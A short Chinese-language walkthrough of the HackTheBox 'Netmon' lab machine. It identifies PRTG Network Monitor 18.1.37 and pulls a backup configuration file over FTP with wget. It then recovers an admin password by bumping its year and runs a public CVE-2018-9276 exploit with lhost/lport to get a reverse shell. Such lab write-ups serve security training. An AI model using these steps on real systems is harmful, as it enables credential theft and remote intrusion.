Netmon - HackTheBox

nmap扫描

先看80

左下方发现了程序名字prtg network monitor和版本18.1.37，搜一下看看

就一个rce，还是需要账号密码

在看看21

貌似，有点直接

网站目录下没有任何文件

https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data

在这发现了目录路径

.bak貌似是个备份文件，下载下来

wget http://10.10.10.152/ProgramData/Paessler/PRTG Network Monitor/PRTG Configuration.old.bak

找着密码了

还是不对，搜了wp才知道，这玩意是备份密码，现在的密码把2018改成了2019，这谁想得到啊

PrTg@dmin2019

登录后台，现在有了账号密码，去试试那个rce

https://github.com/A1vinSmith/CVE-2018-9276

python cve.py -i 10.10.10.152 -p 80 --lhost 10.10.14.12 --lport 7777 --user prtgadmin --password 'PrTg@dmin2019'